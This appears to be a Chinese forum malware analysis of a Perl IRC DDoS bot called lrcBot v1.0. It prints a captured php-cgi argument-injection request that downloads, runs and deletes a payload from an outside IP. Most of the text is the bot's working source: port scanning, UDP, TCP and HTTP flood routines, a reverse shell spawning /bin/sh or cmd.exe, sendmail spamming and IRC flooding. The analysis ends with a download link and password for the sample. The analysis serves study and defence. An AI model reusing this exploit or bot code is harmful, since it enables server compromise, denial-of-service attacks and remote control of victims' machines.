DDoS Perl lrcBotv1.0分析
# DDoS Perl lrcBotv1.0分析

### 0x10 对.cap分析
WireShark追踪流量包,发现异常如下(把URL解码后可以看出,这个POST请求其实是向 /cgi-bin/php 传递一串 -d 命令行选项,即 php-cgi 参数注入;其中 auto_prepend_file=php://input 让PHP把请求体当作代码执行,因此下面请求体里的 <? system(...) ?> 得以在服务器上运行):
```bash
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
<? system("cd /tmp ; wget http://167.88.**.**/js/zmuie ; curl -O http://167.88.**.**/js/zmuie; fetch http://167.88.**.**/js/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie; rm -rf zmuie* "); ?>
#先进入/tmp目录,依次用wget/curl/fetch(兼容不同系统)把资源zmuie下载下来;chmod +x赋予可执行权限后直接运行(./zmuie 与 perl zmuie 两种方式,zmuie本身是Perl脚本,无需编译),最后rm -rf删除文件以清除痕迹
```
### 0x20 对.perl文件进行分析
#### 1、端口扫描
```perl
###########端口扫描,对1到65533个端口进行扫描
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Scanning for open ports on 12".$1." 9,1started. ");
foreach my $porta (@portas){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Open ports found: 12@aberta ");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1No open ports found. ");
}
}
```
#### 2、正则匹配文件目录
```perl
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {##通过正则匹配下载文件目录
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Downloaded the file: 12$2 9,1from 12$1 ");##文件位置
}
##############
if ($funcarg =~ /^dns\s+(.*)/){ #解析DNS
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) { #尝试验证上述列出可用端口
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
}
}
```
#### 3、通过UDP-1进行DDoS
```perl
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-1进行DDos
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17); #通过socket通信
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ; #文件大小限制在1024个字节内
$porta = int(rand 65000) +1 if ($porta == "0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
```
#### 4、通过UDP-2进行DDoS
```perl
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-2进行DDos
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); #udpflood使受攻击的机器访问速度变慢,大量资源被占用
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
```
#### 5、通过TCP进行DDoS
```perl
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) { #TCP进行DDos
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");#udpflood使受攻击的机器访问速度变慢,大量资源被占用
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
```
#### 6、通过HTTP协议进行DDoS
```perl
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking ended on: 12".$1."9,1. ");
}
```
### 0x30 函数解析
#### 1、getprotobyname(cback 反弹shell)
```perl
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) { #通过getprotobyname()返回tcp信息获取主机的地址IP,端口
my $host = "$1";
my $port = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") { #判断操作系统是否匹配Win32,如果是则启动cmd.exe,并且通过socket通信
$shell = "cmd.exe";
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Connecting to 12$host:$port ");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");#启动系统shell
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {#通过mail发送/usr/sbin/sendmail
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Sending email to: 12$3 ");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
```
#### 2、IRC拒绝服务式攻击
在IRC网络上进行flood,是一种把用户与IRC服务器强行断开连接(拒绝服务)的方法:耗尽带宽,导致网络延迟。
```perl
##############由于ctcp几乎在每个客户端都被实施,大多数用户对CTCP请求做出响应,通过发送太多请求,经过几个路由,他们将从IRC服务器断开连接。最广泛使用的类型是ping,CTCP。
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1CTCP Flooding: 12".$target." ");
for (1..10) {
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
}
}
##############
#msgflood向受害者发送大量私人消息,造成资源占用和拥堵。
if ($funcarg =~ /^msgflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1MSG Flooding: 12".$target." ");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
#noticeflood与msgflood类似,使用notice命名造成资源占用拥堵
if ($funcarg =~ /^noticeflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1NOTICE Flooding: 12".$target." ");
for (1..2){
sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
}
##############
```
### 0x40 相关下载
链接:https://pan.baidu.com/s/1pMZrT27 密码:08gy ,压缩包的提取密码:52pojie
程序不含木马,病毒,分析环境为Win7,建议在52虚拟机中运行。
![](http://oy3mfxixl.bkt.clouddn.com/201802021745_987.png)